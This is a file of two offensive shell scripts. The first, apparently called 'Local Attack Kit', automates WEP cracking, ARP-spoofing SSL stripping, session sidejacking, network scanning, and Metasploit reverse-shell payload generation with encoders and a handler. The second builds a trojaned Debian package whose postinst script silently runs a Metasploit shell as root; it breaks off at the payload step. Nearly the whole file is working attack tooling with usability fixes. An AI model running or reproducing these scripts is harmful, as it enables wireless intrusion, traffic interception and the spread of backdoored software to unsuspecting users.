
LAK

#!/bin/sh

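autonmap() {
  # Scan the local /24 (derived from the default gateway) with nmap: all
  # TCP ports, service and OS detection, open ports only, normal-format
  # report written to ./report.  Linux only (uses ip(8)); -O/-sV need root.
  clear
  cat <<EOF
       .----------------.  .----------------.  .----------------. 
      | .--------------. || .--------------. || .--------------. |
      | |   _____      | || |      __      | || |  ___  ____   | |
      | |  |_   _|     | || |     /  \     | || | |_  ||_  _|  | |
      | |    | |       | || |    / /\ \    | || |   | |_/ /    | |
      | |    | |   _   | || |   / ____ \   | || |   |  __'.    | |
      | |   _| |__/ |  | || | _/ /    \ \_ | || |  _| |  \ \_  | |
      | |  |________|  | || ||____|  |____|| || | |____||____| | |
      | |              | || |              | || |              | |
      | '--------------' || '--------------' || '--------------' |
       '----------------'  '----------------'  '----------------'        
EOF
  # Take the gateway of the first "via" route only.  The original collected
  # every "via" line, so a host with more than one such route ended up with
  # a multi-word IP and a broken nmap command line.  (It also assigned a
  # misspelt IO="" that nothing read.)
  case "$(uname)" in
    Linux) IP=$(ip route show | awk '/via/ { print $3; exit }') ;;
    *)     IP="" ;;
  esac
  if [ -z "$IP" ]; then
    # The original fell through here and scanned the literal "Unknown/24".
    printf '%s\n' "Could not determine the default gateway (Linux only); aborting scan." >&2
    return 1
  fi
  echo "Scanning $IP/24 This Could Take Some Time"

  # -Pn: skip host discovery (the deprecated -PN spelling meant the same);
  # -p 0-65535: every TCP port; --open: only report ports that are open.
  nmap -Pn -O -sV "$IP/24" -p 0-65535 --open -oN report
}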
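Windowsx86() {
  # Interactive x86 Windows payload builder: pick a payload and an encoder
  # from the lists below, give LHOST/LPORT, and the function writes the
  # encoded executable to /root/out.exe and starts a multi/handler for it.
  #
  # Fixes over the original: the chosen payload is actually the one that is
  # generated (the original always built windows/shell/reverse_tcp while
  # the handler waited for whatever was selected), the encoder choice is
  # applied through msfencode (ENCODING= is not something msfpayload
  # honours), blank/non-numeric input is rejected, and expansions are
  # quoted.  Under #!/bin/sh the prompts use printf, since echo -n is not
  # portable.
  clear
  cat << EOF

Please Select A Payload:

windows/meterpreter/bind_ipv6_tcp                Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
windows/meterpreter/bind_tcp                     Windows Meterpreter (Reflective Injection), Bind TCP Stager
windows/meterpreter/find_tag                     Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager
windows/meterpreter/reverse_ipv6_tcp             Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
windows/meterpreter/reverse_tcp                  Windows Meterpreter (Reflective Injection), Reverse TCP Stager
windows/shell/bind_tcp                           Windows Command Shell, Bind TCP Stager
windows/shell/find_tag                           Windows Command Shell, Find Tag Ordinal Stager
windows/shell/reverse_ipv6_tcp                   Windows Command Shell, Reverse TCP Stager (IPv6)
windows/shell/reverse_tcp                        Windows Command Shell, Reverse TCP Stager
windows/shell_bind_tcp                           Windows Command Shell, Bind TCP Inline
windows/shell_bind_tcp_xpfw                      Windows Disable Windows ICF, Command Shell, Bind TCP Inline
windows/shell_reverse_tcp                        Windows Command Shell, Reverse TCP Inline
windows/vncinject/bind_ipv6_tcp                  VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
windows/vncinject/bind_tcp                       VNC Server (Reflective Injection), Bind TCP Stager
windows/vncinject/find_tag                       VNC Server (Reflective Injection), Find Tag Ordinal Stager
windows/vncinject/reverse_ipv6_tcp               VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
windows/vncinject/reverse_tcp                    VNC Server (Reflective Injection), Reverse TCP Stager



EOF
  printf '%s' "LAK>"
  read -r List
  clear
  cat << EOF

Please Select A Encoder:
 
x86/alpha_mixed            Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper            Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower     Avoid UTF8/tolower
x86/call4_dword_xor        Call+4 Dword XOR Encoder
x86/countdown              Single-byte XOR Countdown Encoder
x86/fnstenv_mov            Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive      Polymorphic Jump/Call XOR Additive Feedback Encoder
x86/nonalpha               Non-Alpha Encoder
x86/nonupper               Non-Upper Encoder
x86/shikata_ga_nai         Polymorphic XOR Additive Feedback Encoder
x86/unicode_mixed          Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper          Alpha2 Alphanumeric Unicode Uppercase Encoder

EOF

  printf '%s' "LAK>"
  read -r A
  clear
  printf '%s\n' "Please enter your ip: "
  printf '%s' "LAK>"
  read -r ip
  clear
  printf '%s\n' "Pleas enter port: "
  printf '%s' "LAK>"
  read -r port
  echo

  # Reject input that can only produce confusing tool errors downstream.
  if [ -z "$List" ] || [ -z "$ip" ]; then
    printf '%s\n' "A payload and an IP address are required." >&2
    return 1
  fi
  case "$port" in
    ''|*[!0-9]*)
      printf '%s\n' "Port must be numeric: '$port'" >&2
      return 1
      ;;
  esac

  # Show the wait message after clearing; the original cleared the screen
  # right after printing it, so the user never saw it.
  clear
  printf '%s\n' "Please Wait While Payload is Generated...."
  sleep 1

  # Raw payload piped through msfencode with the chosen encoder (the same
  # msfpayload R | msfencode pipeline the encoder wrapper later in this
  # collection uses).  With no encoder chosen, emit the plain executable.
  if [ -n "$A" ]; then
    msfpayload "$List" LHOST="$ip" LPORT="$port" R \
      | msfencode -e "$A" -t exe -o /root/out.exe
  else
    msfpayload "$List" LHOST="$ip" LPORT="$port" X > /root/out.exe
  fi || {
    printf '%s\n' "Payload generation failed; not starting a handler." >&2
    return 1
  }

  # NOTE(review): the handler only gets LHOST/LPORT, so the bind_* and
  # find_tag entries in the list presumably need RHOST set by hand.
  msfcli exploit/multi/handler PAYLOAD="$List" LHOST="$ip" LPORT="$port" E
}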

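Windowsx64() {
  # Interactive x64 Windows payload builder; same flow as Windowsx86 but
  # with the x64 payload list.  Writes /root/out.exe, then starts a
  # multi/handler for the chosen payload.
  #
  # Fixes over the original: the selected payload is the one generated
  # (the original always built windows/x64/shell/reverse_tcp regardless of
  # the choice), the encoder is applied through msfencode, blank or
  # non-numeric input is rejected, expansions are quoted, and prompts use
  # printf because echo -n is not portable under #!/bin/sh.
  #
  # NOTE(review): the encoder menu below is the x86 list carried over from
  # Windowsx86; whether those encoders are valid for x64 payloads is not
  # something this script establishes -- confirm before relying on it.
  clear
  cat << EOF
Please Select A Payload:
    
windows/x64/exec                        Execute Command
windows/x64/meterpreter/bind_tcp        Meterpreter,Bind TCP Stager
windows/x64/meterpreter/reverse_tcp     Meterpreter,Reverse TCP Stager
windows/x64/shell/bind_tcp              Command Shell,Bind TCP Stager
windows/x64/shell/reverse_tcp           Command Shell,Reverse TCP Stager
windows/x64/shell_bind_tcp              Command Shell,Bind TCP Inline
windows/x64/shell_reverse_tcp           Command Shell,Reverse TCP Inline
 

EOF
  printf '%s' "LAK>"
  read -r List
  clear
  cat << EOF

Please Select A Encoder:
 
x86/alpha_mixed            Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper            Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower     Avoid UTF8/tolower
x86/call4_dword_xor        Call+4 Dword XOR Encoder
x86/countdown              Single-byte XOR Countdown Encoder
x86/fnstenv_mov            Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive      Polymorphic Jump/Call XOR Additive Feedback Encoder
x86/nonalpha               Non-Alpha Encoder
x86/nonupper               Non-Upper Encoder
x86/shikata_ga_nai         Polymorphic XOR Additive Feedback Encoder
x86/unicode_mixed          Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper          Alpha2 Alphanumeric Unicode Uppercase Encoder

EOF
  printf '%s' "LAK>"
  read -r A
  clear
  printf '%s\n' "Please enter your ip: "
  printf '%s' "LAK>"
  read -r ip
  clear
  printf '%s\n' "Pleas enter port: "
  printf '%s' "LAK>"
  read -r port
  echo

  if [ -z "$List" ] || [ -z "$ip" ]; then
    printf '%s\n' "A payload and an IP address are required." >&2
    return 1
  fi
  case "$port" in
    ''|*[!0-9]*)
      printf '%s\n' "Port must be numeric: '$port'" >&2
      return 1
      ;;
  esac

  clear
  printf '%s\n' "Please Wait While Payload is Being Generated...."
  sleep 1

  if [ -n "$A" ]; then
    msfpayload "$List" LHOST="$ip" LPORT="$port" R \
      | msfencode -e "$A" -t exe -o /root/out.exe
  else
    msfpayload "$List" LHOST="$ip" LPORT="$port" X > /root/out.exe
  fi || {
    printf '%s\n' "Payload generation failed; not starting a handler." >&2
    return 1
  }

  # NOTE(review): bind_tcp entries presumably need RHOST for the handler,
  # which this menu never asks for.
  msfcli exploit/multi/handler PAYLOAD="$List" LHOST="$ip" LPORT="$port" E
}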

menu12() {
  # Draw the payload-type menu (banner, three choices, prompt without a
  # trailing newline).  The caller reads the answer.
  clear
  cat << EOF
      
       .----------------.  .----------------.  .----------------. 
      | .--------------. || .--------------. || .--------------. |
      | |   _____      | || |      __      | || |  ___  ____   | |
      | |  |_   _|     | || |     /  \     | || | |_  ||_  _|  | |
      | |    | |       | || |    / /\ \    | || |   | |_/ /    | |
      | |    | |   _   | || |   / ____ \   | || |   |  __'.    | |
      | |   _| |__/ |  | || | _/ /    \ \_ | || |  _| |  \ \_  | |
      | |  |________|  | || ||____|  |____|| || | |____||____| | |
      | |              | || |              | || |              | |
      | '--------------' || '--------------' || '--------------' |
       '----------------'  '----------------'  '----------------' 

   Please Select A Payload Type

      1. Windowsx64
      2. Windowsx86
      3. Exit


EOF
  printf '%s' "LAK>"
}
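loop() {
  # Payload-type menu loop: redraw menu12 until a valid entry is chosen.
  # 1/2 run the builders, 3 exits the whole script (as in the original).
  while true; do
    menu12
    read -r answer
    case "$answer" in
      1) Windowsx64 ;;
      2) Windowsx86 ;;
      3) exit ;;
      *)
        # The original called loop() again here, so every bad keystroke
        # nested one more copy of this loop; the enclosing while already
        # re-prompts, so just go round again.
        continue
        ;;
    esac
  done
}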





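# Early argument dispatch left over from a template.  helploop, filoop,
# procloop and statloop are not defined anywhere in this script, so every
# arm of the original case (including the default) printed "command not
# found" and then fell through to the menus below.  Keep the fall-through,
# drop the dead calls; the dispatcher at the bottom of the file is the one
# that handles "$1".
case "$1" in
  help|file|text|status) ;;
  *) ;;
esac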



wepcracker() {
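# ---------------------------------------------------------------------------
# Shared helpers for the WEP attacks below.  They set the globals the
# original functions used (DEVICE, mac, bss, channel) so each attack keeps
# its name and flow while the copy-pasted setup lives in one place.
# Linux only (ifconfig, macchanger, aircrack-ng suite, xterm); needs root.
# ---------------------------------------------------------------------------

# Set DEVICE to the first interface whose name starts with "wlan".
# The original grep "wlan*" matched "wla" anywhere on any line and returned
# every hit, so a second wlan interface produced a two-word DEVICE and
# broken ifconfig calls.  Returns 1 (with a message) when nothing is found.
lak_wlan_device() {
  case "$(uname)" in
    Linux)
      # sub() strips the trailing colon that newer net-tools print ("wlan0:").
      DEVICE=$(ifconfig -a | awk '$1 ~ /^wlan/ { sub(/:$/, "", $1); print $1; exit }')
      [ -n "$DEVICE" ] || DEVICE="Unknown"
      ;;
    *) DEVICE="Unknown" ;;
  esac
  if [ "$DEVICE" = "Unknown" ]; then
    printf '%s\n' "No wlan interface found (Linux only); cannot continue." >&2
    return 1
  fi
}

# Bring DEVICE down, set its MAC to $1 with macchanger, bring it back up.
lak_set_mac() {
  ifconfig "$DEVICE" down
  macchanger -m "$1" "$DEVICE"
  clear
  ifconfig "$DEVICE" up
}

# Spoof the fixed attack MAC, scan for WEP networks for ten seconds with
# airodump-ng (writes out-01.csv in the current directory), list the BSSIDs
# seen and prompt for the one to attack.  Sets mac, bss and channel.
# Returns 1 when no BSSID was entered so callers do not start injecting
# against an empty target.
lak_find_ap() {
  mac='00:11:22:33:44:55'
  echo "Spoofing Mac Address New Mac $mac"
  lak_set_mac "$mac"
  echo "Scanning For Access Points"
  xterm -e airodump-ng -w out --encrypt WEP "$DEVICE" &
  lak_scan_pid=$!
  sleep 10
  # Stop our own scanner window only; the original killall xterm closed
  # every xterm on the desktop.
  kill "$lak_scan_pid" 2>/dev/null
  bssid=$(grep WEP out-01.csv 2>/dev/null | awk '{print $1}' | cut -d "," -f 1)
  clear
  printf '%s\n' "$bssid"
  printf '%s' "Please Enter Bssid: "
  read -r bss
  if [ -z "$bss" ]; then
    printf '%s\n' "No BSSID entered; aborting." >&2
    return 1
  fi
  # Same whitespace-split/cut pipeline as the original: on airodump's CSV
  # the sixth blank-separated word is "<channel>," for the matching row.
  channel=$(grep -F -- "$bss" out-01.csv | awk '{print $6}' | cut -d "," -f 1)
}

# Kill the background processes whose PIDs are given.  Replaces the
# original killall xterm / killall airodump-ng, which also hit unrelated
# instances on the host.
lak_stop_pids() {
  for lak_pid in "$@"; do
    kill "$lak_pid" 2>/dev/null
  done
}

macspoof() {
  # Prompt for a MAC address and apply it to the wlan interface.
  lak_wlan_device || return 1
  printf '%s' "Please Enter Mac Address You Would Like To Spoof: "
  read -r spoof
  # Accept only the colon-separated hex form before handing the value to
  # macchanger/ifconfig; the original passed any input through unquoted.
  hx='[0-9a-fA-F][0-9a-fA-F]'
  case "$spoof" in
    $hx:$hx:$hx:$hx:$hx:$hx) ;;
    *)
      printf '%s\n' "Not a valid MAC address: '$spoof'" >&2
      return 1
      ;;
  esac
  lak_set_mac "$spoof"
  echo "Your New Mac Address is $spoof"
}

korekchopchop() {
  # Clientless WEP attack via KoreK chop-chop (aireplay-ng -4): fake-auth,
  # recover a keystream (.xor), forge an ARP packet with it, replay it to
  # generate IVs, then run aircrack-ng on the capture.
  clear
  lak_wlan_device || return 1
  lak_find_ap || return 1
  airodump-ng -c "$channel" -w wep --ivs --bssid "$bss" "$DEVICE" &
  dump_pid=$!
  xterm -e aireplay-ng -1 0 -a "$bss" -h "$mac" "$DEVICE" &
  auth_pid=$!
  xterm -e aireplay-ng -4 -b "$bss" -h "$mac" "$DEVICE"
  # The forged packet is written to and replayed from the same relative
  # path.  The original wrote /root/frag but replayed ./frag (and removed
  # ./frag), which only lined up when the script ran from /root.
  xterm -e packetforge-ng -0 -a "$bss" -h "$mac" -k 255.255.255.255 -l 255.255.255.255 -y replay*.xor -w frag
  xterm -e aireplay-ng -2 -r frag -h "$mac" "$DEVICE" &
  replay_pid=$!
  sleep 10
  xterm -e aircrack-ng wep*.ivs -l key
  lak_stop_pids "$replay_pid" "$auth_pid" "$dump_pid"
  # Narrowed from "rm out*": only airodump/aireplay artefacts go.
  rm -f out-0[0-9]* wep-0[0-9]* replay_* frag
}

framentation() {
  # Clientless WEP attack via fragmentation (aireplay-ng -5); otherwise the
  # same pipeline as korekchopchop.
  clear
  lak_wlan_device || return 1
  lak_find_ap || return 1
  airodump-ng -c "$channel" -w wep --ivs --bssid "$bss" "$DEVICE" &
  dump_pid=$!
  xterm -e aireplay-ng -1 0 -a "$bss" -h "$mac" "$DEVICE" &
  auth_pid=$!
  xterm -e aireplay-ng -5 -b "$bss" -h "$mac" "$DEVICE"
  xterm -e packetforge-ng -0 -a "$bss" -h "$mac" -k 255.255.255.255 -l 255.255.255.255 -y fragment*.xor -w frag
  xterm -e aireplay-ng -2 -r frag -h "$mac" "$DEVICE"
  sleep 10
  xterm -e aircrack-ng wep*.ivs -l key
  lak_stop_pids "$auth_pid" "$dump_pid"
  # The -5 step writes fragment-*.xor; the original only removed replay_*.
  rm -f out-0[0-9]* wep-0[0-9]* replay_* fragment-* frag
}

injectiontest() {
  # aireplay-ng injection test against whatever wlan interface is found.
  clear
  lak_wlan_device || return 1
  aireplay-ng -9 "$DEVICE"
}

client0841() {
  # Client-based WEP attack: fake-auth, then interactive replay of captured
  # frames (aireplay-ng -2) to the broadcast address while airodump
  # collects IVs.
  # NOTE(review): the function name refers to the 0841 frame-control
  # option, but the original never passed -p 0841 to aireplay-ng; confirm
  # whether that was intended before adding it.
  clear
  lak_wlan_device || return 1
  lak_find_ap || return 1
  airodump-ng -c "$channel" -w wep --ivs --bssid "$bss" "$DEVICE" &
  dump_pid=$!
  xterm -e aireplay-ng -1 0 -a "$bss" -h "$mac" "$DEVICE" &
  auth_pid=$!
  # The original had "$DEVICE.&" -- the stray dot became part of the
  # interface name, so aireplay-ng was started against "wlan0." and failed.
  xterm -e aireplay-ng -2 -b "$bss" -t 1 -d FF:FF:FF:FF:FF:FF -h "$mac" "$DEVICE" &
  replay_pid=$!
  sleep 10
  xterm -e aircrack-ng wep*.ivs -l key
  lak_stop_pids "$replay_pid" "$auth_pid" "$dump_pid"
  rm -f out-0[0-9]* wep-0[0-9]* replay_*
}

arpreplay() {
  # Client-based WEP attack: fake-auth, then ARP request replay
  # (aireplay-ng -3) to generate IVs, then aircrack-ng.
  clear
  lak_wlan_device || return 1
  lak_find_ap || return 1
  airodump-ng -c "$channel" -w wep --ivs --bssid "$bss" "$DEVICE" &
  dump_pid=$!
  xterm -e aireplay-ng -1 0 -a "$bss" -h "$mac" "$DEVICE" &
  auth_pid=$!
  xterm -e aireplay-ng -3 -b "$bss" -h "$mac" "$DEVICE" &
  replay_pid=$!
  sleep 10
  xterm -e aircrack-ng wep*.ivs -l key
  lak_stop_pids "$replay_pid" "$auth_pid" "$dump_pid"
  rm -f out-0[0-9]* wep-0[0-9]* replay_*
}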

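menu1() {
  # Draw the WEP attack menu in colour 9 and prompt (no trailing newline).
  # The colour attribute is reset before returning: the original never
  # called tput sgr0, so everything printed after the menu stayed coloured.
  clear
  tput setaf 9; cat << EOF
       .----------------.  .----------------.  .----------------. 
      | .--------------. || .--------------. || .--------------. |
      | |   _____      | || |      __      | || |  ___  ____   | |
      | |  |_   _|     | || |     /  \     | || | |_  ||_  _|  | |
      | |    | |       | || |    / /\ \    | || |   | |_/ /    | |
      | |    | |   _   | || |   / ____ \   | || |   |  __'.    | |
      | |   _| |__/ |  | || | _/ /    \ \_ | || |  _| |  \ \_  | |
      | |  |________|  | || ||____|  |____|| || | |____||____| | |
      | |              | || |              | || |              | |
      | '--------------' || '--------------' || '--------------' |
       '----------------'  '----------------'  '----------------'        
            
EOF

  echo "   Please Select A Type Of Attack"
  echo
  echo "      1. Client Based Arp Replay"
  echo "      2. Client Based 0841"
  echo "      3. Clientless Fragmentation"
  echo "      4. Clientless Korek Chop Chop"
  echo "      5  Injection Test"
  echo "      6. Spoof Mac Address"
  echo "      7. Exit"
  echo
  printf '%s' "     LAK>"
  tput sgr0
}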
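menu2() {
  # WEP attack menu loop: redraw menu1 until a valid entry; 7 exits the
  # whole script (as in the original).
  while true; do
    menu1
    read -r answer
    case "$answer" in
      1) arpreplay ;;
      2) client0841 ;;
      3) framentation ;;
      4) korekchopchop ;;
      5) injectiontest ;;
      6) macspoof ;;
      7) exit ;;
      *)
        # The original recursed into menu2 here, nesting a loop per bad
        # keystroke; the enclosing while already re-prompts.
        continue
        ;;
    esac
  done
}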

# Both arms of the original case ("help" and everything else) ran menu2,
# so there is nothing to dispatch on: open the attack menu directly.
menu2
}
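sslsniff() {
  # SSL-stripping MITM against one LAN host: enable IP forwarding, redirect
  # port-80 traffic to sslstrip on 8080, ARP-spoof with arpspoof, and run
  # ettercap in the foreground.  When ettercap returns, everything that was
  # started or changed is undone -- the original left ip_forward on, the
  # NAT rule in place and the arpspoof/sslstrip xterms running.
  # Linux only; needs root.
  clear
  cat << EOF
 
       .----------------.  .----------------.  .----------------. 
      | .--------------. || .--------------. || .--------------. |
      | |   _____      | || |      __      | || |  ___  ____   | |
      | |  |_   _|     | || |     /  \     | || | |_  ||_  _|  | |
      | |    | |       | || |    / /\ \    | || |   | |_/ /    | |
      | |    | |   _   | || |   / ____ \   | || |   |  __'.    | |
      | |   _| |__/ |  | || | _/ /    \ \_ | || |  _| |  \ \_  | |
      | |  |________|  | || ||____|  |____|| || | |____||____| | |
      | |              | || |              | || |              | |
      | '--------------' || '--------------' || '--------------' |
       '----------------'  '----------------'  '----------------' 

EOF
  case "$(uname)" in
    Linux)
      # First "wlan" interface only (the original grep "wlan*" returned
      # every line containing "wla"); strip a trailing colon from newer
      # net-tools output.
      iface=$(ifconfig -a | awk '$1 ~ /^wlan/ { sub(/:$/, "", $1); print $1; exit }')
      # First "via" route only; the original collected all of them.
      tdg=$(ip route show | awk '/via/ { print $3; exit }')
      ;;
    *)
      iface=""
      tdg=""
      ;;
  esac
  if [ -z "$iface" ] || [ -z "$tdg" ]; then
    printf '%s\n' "Could not determine the wlan interface or the gateway (Linux only)." >&2
    return 1
  fi
  printf '%s' "Please Enter Target Ip To Sniff: "
  read -r tip
  # The target goes straight into iptables/arpspoof/ettercap arguments;
  # only accept a dotted IPv4 address.
  case "$tip" in
    ''|*[!0-9.]*)
      printf '%s\n' "Target must be a dotted IPv4 address: '$tip'" >&2
      return 1
      ;;
  esac
  clear
  cat << EOF
 
       .----------------.  .----------------.  .----------------. 
      | .--------------. || .--------------. || .--------------. |
      | |   _____      | || |      __      | || |  ___  ____   | |
      | |  |_   _|     | || |     /  \     | || | |_  ||_  _|  | |
      | |    | |       | || |    / /\ \    | || |   | |_/ /    | |
      | |    | |   _   | || |   / ____ \   | || |   |  __'.    | |
      | |   _| |__/ |  | || | _/ /    \ \_ | || |  _| |  \ \_  | |
      | |  |________|  | || ||____|  |____|| || | |____||____| | |
      | |              | || |              | || |              | |
      | '--------------' || '--------------' || '--------------' |
       '----------------'  '----------------'  '----------------' 
EOF

  echo "The selected interface is $iface"
  echo "The target gateway is $tdg"
  echo "Starting....."
  sleep 2
  clear

  # Remember the forwarding state so it can be put back afterwards.
  saved_forward=$(cat /proc/sys/net/ipv4/ip_forward)
  echo 1 > /proc/sys/net/ipv4/ip_forward
  iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
  xterm -e arpspoof -i "$iface" -t "$tip" "$tdg" &
  arp_pid=$!
  xterm -e python /pentest/web/sslstrip/sslstrip.py -a -l 8080 &
  strip_pid=$!
  clear
  ettercap -T -q -i "$iface" -M arp:remote "/$tip/" "/$tdg/"

  # Tear down once ettercap exits (quit it with q; NOTE(review): Ctrl-C
  # interrupts the whole script and skips this cleanup).
  kill "$arp_pid" "$strip_pid" 2>/dev/null
  iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
  echo "$saved_forward" > /proc/sys/net/ipv4/ip_forward
}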

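sidejack() {
  # Session side-jacking with hamster/ferret: ferret captures on the wlan
  # interface in the background, hamster runs in a foreground xterm (the
  # browser is pointed at its proxy on 127.0.0.1:1234).  When the hamster
  # window closes, only the ferret we started is stopped -- the original
  # killall'd every hamster and ferret on the host.  Linux only; needs root.
  clear
  cat << EOF
 
       .----------------.  .----------------.  .----------------. 
      | .--------------. || .--------------. || .--------------. |
      | |   _____      | || |      __      | || |  ___  ____   | |
      | |  |_   _|     | || |     /  \     | || | |_  ||_  _|  | |
      | |    | |       | || |    / /\ \    | || |   | |_/ /    | |
      | |    | |   _   | || |   / ____ \   | || |   |  __'.    | |
      | |   _| |__/ |  | || | _/ /    \ \_ | || |  _| |  \ \_  | |
      | |  |________|  | || ||____|  |____|| || | |____||____| | |
      | |              | || |              | || |              | |
      | '--------------' || '--------------' || '--------------' |
       '----------------'  '----------------'  '----------------' 

EOF
  printf '%s\n' "Please Set Proxy to http://127.0.0.1 on port 1234 in firefox"
  sleep 5
  echo
  case "$(uname)" in
    Linux) iface=$(ifconfig -a | awk '$1 ~ /^wlan/ { sub(/:$/, "", $1); print $1; exit }') ;;
    *)     iface="" ;;
  esac
  if [ -z "$iface" ]; then
    printf '%s\n' "No wlan interface found (Linux only); cannot continue." >&2
    return 1
  fi
  /pentest/sniffers/hamster/ferret -i "$iface" &
  ferret_pid=$!
  # Foreground: returns when the hamster window is closed, so hamster
  # itself is already gone by the time we get here.
  xterm -e /pentest/sniffers/hamster/hamster
  kill "$ferret_pid" 2>/dev/null
}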
menu1(){
  # Draw the Local Attack Kit main menu and the prompt (no trailing
  # newline).  The caller reads the answer.
  clear
  cat << EOF
       .----------------.  .----------------.  .----------------. 
      | .--------------. || .--------------. || .--------------. |
      | |   _____      | || |      __      | || |  ___  ____   | |
      | |  |_   _|     | || |     /  \     | || | |_  ||_  _|  | |
      | |    | |       | || |    / /\ \    | || |   | |_/ /    | |
      | |    | |   _   | || |   / ____ \   | || |   |  __'.    | |
      | |   _| |__/ |  | || | _/ /    \ \_ | || |  _| |  \ \_  | |
      | |  |________|  | || ||____|  |____|| || | |____||____| | |
      | |              | || |              | || |              | |
      | '--------------' || '--------------' || '--------------' |
       '----------------'  '----------------'  '----------------' 
                           
Local Attack Kit Main Menu :                            

     1. WEP Cracking
     2. WPA Cracking
     3. SSL Sniffing
     4. Side Jacking
     5. AutoNmap
     6. PayloadGen
     7. Exit


EOF
  printf '%s' "     LAK>"
}
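menu2() {
  # Main menu loop: redraw menu1 until a valid entry; 7 exits the script.
  # Option 2 (WPA Cracking) is listed but wpacracker is not defined
  # anywhere in this script -- the original called it anyway and the shell
  # printed "command not found".  Report that instead, and re-prompt on
  # bad input rather than recursing into another copy of this loop.
  while true; do
    menu1
    read -r answer
    case "$answer" in
      1) wepcracker ;;
      2)
        if command -v wpacracker >/dev/null 2>&1; then
          wpacracker
        else
          printf '%s\n' "WPA Cracking is not implemented in this build." >&2
          sleep 2
        fi
        ;;
      3) sslsniff ;;
      4) sidejack ;;
      5) autonmap ;;
      6) loop ;;
      7) exit ;;
      *) continue ;;
    esac
  done
}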
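# Entry point: dispatch on the first argument.  "file", "text" and "status"
# were wired to filoop, procloop and statloop, none of which exist in this
# script, so the original failed with "command not found" for them.  Say so
# and exit non-zero; "help" and no argument open the main menu as before.
case "$1" in
  file|text|status)
    printf '%s\n' "Mode '$1' is not implemented; run without arguments for the menu." >&2
    exit 1
    ;;
  *)
    menu2
    ;;
esac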

bash script to generate a Debian (.deb) package trojan using Metasploit payload

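#!/bin/bash

# bash script to generate a Debian (.deb) package trojan using Metasploit payload
# Author:  Aaron Hine - @redmeat_uk
# Date: 31-01-2010

# Disclaimer: this script should be used for educational purposes.  You should obtain permission before running this against an indvidual or company.  
# The author is not liable for any illegal use of this script.

# Reviewer revision (flow unchanged):
#  - every expansion is quoted and input is read with -r;
#  - the package name, menu choice, filename and webroot are checked before
#    they reach apt/dpkg/msfpayload, and each step stops the script on
#    failure instead of silently building a broken or empty .deb;
#  - only the exact package's archive is taken from the apt cache (the
#    original "mv $package*" also grabbed e.g. foo-common next to foo);
#  - the generated postinst runs as root already, so the redundant sudo is
#    dropped and the paths are quoted.
# NOTE(review): tmpdir is still the fixed /tmp/evildeb from the settings
# block; a predictable /tmp path can be pre-created by any local user, so
# prefer a private mktemp -d directory on shared hosts.

scriptname=$(basename "$0")

die() { printf '%s\n' "$*" >&2; exit 1; }

if [[ $UID -ne 0 ]]; then
  echo "${scriptname} must be run as root"
  exit 1
fi

# 
echo
echo "#####################################################################"
echo "Script to generate a Debian package trojan using a Metasploit payload"
echo "#####################################################################"
echo 

# change these vars to suit your needs
msfdir="/opt/metasploit3/msf3"
tmpdir="/tmp/evildeb"
workdir="$tmpdir/work"

# prompt for package name and setup dirs
echo "Please enter the name of the APT package you wish to trojan:"
echo "Use apt-cache search <package> for ideas :)"
echo
read -r package
# A package name is a plain token; anything else would turn into path or
# option syntax for apt/dpkg/mv below.
[[ "$package" =~ ^[a-z0-9][a-z0-9+.-]*$ ]] || die "Not a valid package name: '$package'"
apt-get --download-only install "$package" || die "apt-get could not download $package"
echo
mkdir -p "$workdir/DEBIAN" || die "could not create $workdir"

# Debian archives are named <name>_<version>_<arch>.deb; match on the
# underscore so only this package's file is picked up.
shopt -s nullglob
debs=(/var/cache/apt/archives/"${package}"_*.deb)
shopt -u nullglob
[[ ${#debs[@]} -ge 1 ]] || die "no downloaded .deb found for $package in /var/cache/apt/archives"
deb="$tmpdir/$(basename "${debs[0]}")"
mv "${debs[0]}" "$deb" || die "could not move ${debs[0]} to $tmpdir"
dpkg -x "$deb" "$workdir" || die "dpkg -x failed on $deb"
# Control file from the cache entry, minus the fields that would no longer
# be true of the rebuilt package.
apt-cache show "$package" | sed -e '/^Original-Maintainer/d' -e '/^SHA/d' > "$workdir/DEBIAN/control" \
  || die "could not write control file"
echo
echo "Please choose your Metasploit payload"
echo "-------------------------------------"
echo 
echo "1. bind tcp"
echo "2. reverse tcp"
echo
echo "press number and hit return:"
read -r choice

# Options are kept as an array so they stay separate arguments to
# msfpayload/msfcli without relying on word-splitting.
case "$choice" in
  1)
    payload="linux/x86/shell/bind_tcp"
    echo "Enter IP:"
    read -r rhostIP
    echo "Enter port:"
    read -r bindport
    options=(RHOST="$rhostIP" LPORT="$bindport")
    ;;
  2)
    payload="linux/x86/shell/reverse_tcp"
    echo "Enter IP:"
    read -r lhostIP
    echo "Enter port:"
    read -r revport
    options=(LHOST="$lhostIP" LPORT="$revport")
    ;;
  *)
    # The original fell through with an empty payload and built anyway.
    die "Invalid choice: '$choice'"
    ;;
esac

echo
echo "Please enter the filename for the Metasploit payload:"
read -r filename
echo
[[ -n "$filename" && "$filename" != */* ]] || die "filename must be a plain file name"

cd "$workdir" || die "cannot cd to $workdir"
# First executable in the package whose path contains the package name
# (the original took every match, which produced a multi-line path).
binary=$(find . -executable -type f -path "*${package}*" | head -n 1 | sed -e 's/^\.//')
[[ -n "$binary" ]] || die "no executable matching '$package' found in the package"
trojan="$filename"

echo "Making post-install script..."
echo

# postinst runs as root during installation: make the dropped payload
# executable, start it in the background, then start the real binary so
# the package still appears to work.
{
  echo "#!/bin/sh"
  echo ""
  echo ""
  echo "chmod 2755 \"$binary$trojan\" && \"$binary$trojan\" & \"$binary\" &"
} > "$workdir/DEBIAN/postinst" || die "could not write postinst"

# Path of the payload inside the package tree (no leading slash).
trojan2="${binary#/}${trojan}"

echo "Thanks - generating your payload..."
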